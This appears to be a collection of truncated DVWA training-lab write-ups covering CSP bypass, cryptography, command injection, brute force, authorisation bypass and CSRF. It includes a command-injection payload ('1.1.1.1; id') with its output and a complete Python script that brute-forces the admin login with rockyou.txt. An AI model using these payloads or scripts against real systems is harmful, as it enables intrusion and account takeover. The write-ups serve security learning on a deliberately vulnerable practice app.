DVWA

Description Vulnerability: CSP Bypass Impact: Bypass CSP policy and inject our desired Javascript code. LOW Security Level This Security Level allow these scripts: $headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;"; // allows js from self, pastebin.com, hastebin.com, jquery, digi.ninja, and google analytics. As it allows https://digi.ninja so we can use https://digi.ninja/dvwa/cookie.js. Result: MEDIUM Security Level The CSP now is new $headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';"; It allows script with nonce: TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA= so the payload is: ...

Description Vulnerability: Cryptography Impact: Decode the encoded string to get the correct password. LOW Security Level In the source code this is how decoding process works: $decoded = xor_this (base64_decode ($password), $key); First Base64 Decode the password then decode with XOR and the key is wachtwoord. I use CyberChef to decode this encoded string: Result: Your new password is: Olifant MEDIUM Security Level The tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). aes-128-ebc is a 128 bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters meaning each byte is two characters. This gives you a block size of 32 characters. ...

Description Vulnerability: Command injection Impact: Get access to server resources through ping function. LOW Security Level This LOW level ping function doesn’t have any filter or regex to check the input we enter for them. Therefore, we can leverage this vulnerability to execute additional commands to the server. Example: 1.1.1.1; id This payload will ping 1.1.1.1 but also run id. The result is: PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=52 time=63.0 ms 64 bytes from 1.1.1.1: icmp_seq=2 ttl=52 time=93.5 ms 64 bytes from 1.1.1.1: icmp_seq=3 ttl=52 time=76.8 ms 64 bytes from 1.1.1.1: icmp_seq=4 ttl=52 time=50.4 ms --- 1.1.1.1 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3005ms rtt min/avg/max/mdev = 50.401/70.910/93.461/16.016 ms uid=33(www-data) gid=33(www-data) groups=33(www-data) ...

Description Vulnerability: Brute-force Impact: Brute-force and get the admin account credentials. LOW Security Level This is the simple code I created to brute-force the admin account using rockyou.txt password lists. Change PHPSESSID to your own one. import requests baseUrl = "http://localhost/DVWA/vulnerabilities/brute/?Login=Login&username=admin" cookies = { "PHPSESSID": "91fdcd96e5376633ef607edd0a1b8093", "security": "low" } try: with open('/usr/share/wordlists/rockyou.txt') as file: for line in file: password = line.rstrip() url = baseUrl + f"&password={password}" try: print(f"Attempting: password={password}") res = requests.get(url, cookies=cookies) if "Username and/or password incorrect." not in res.text: print() print("=> Password found: ", password) exit() except requests.exceptions.RequestException as e: print("Request error:", e) continue except FileNotFoundError as e: print("File not found:", e) MEDIUM Security Level The only difference between LOW and MEDIUM level is in the Login failed if logic: ...

Description Vulnerability: Authorisation Bypass Impact: Leveraging vulnerabilities to get access to user manager system. LOW Security Level The source code doesn’t have any checks. You can use gordonb / abc123 this account (this is not an admin account). Since the source code doesn’t have any checks so we can just access to the URL: http://localhost/DVWA/vulnerabilities/authbypass/ MEDIUM Security Level The source code now updated with a check: /* Only the admin user is allowed to access this page. Have a look at these two files for possible vulnerabilities: * vulnerabilities/authbypass/get_user_data.php * vulnerabilities/authbypass/change_user_details.php */ if (dvwaCurrentUser() != "admin") { print "Unauthorised"; http_response_code(403); exit; } Let’s take a look at those 2 files, visit get_user_data.php we got: ...

DVWA’s CSRF Challenge This challenge works around a password reset form, enabling admin to change their password. The first three levels can be exploited with these solutions: LOW Security Level: we just need a URL with correct params setup, from that URL make a GET request and we can change the password. MEDIUM Security Level: this level adds a check of Referer header, since it should be the same as where the request originated from, a simple curl command may exploit this level. HIGH Security Level: this is where the game plays, it needs a CSRF token for every request to change the password. This is not so hard to exploit - a Python script can exploit it. For more information: https://github.com/jameskaois/dvwa-vulnerabilities/tree/main/csrf ...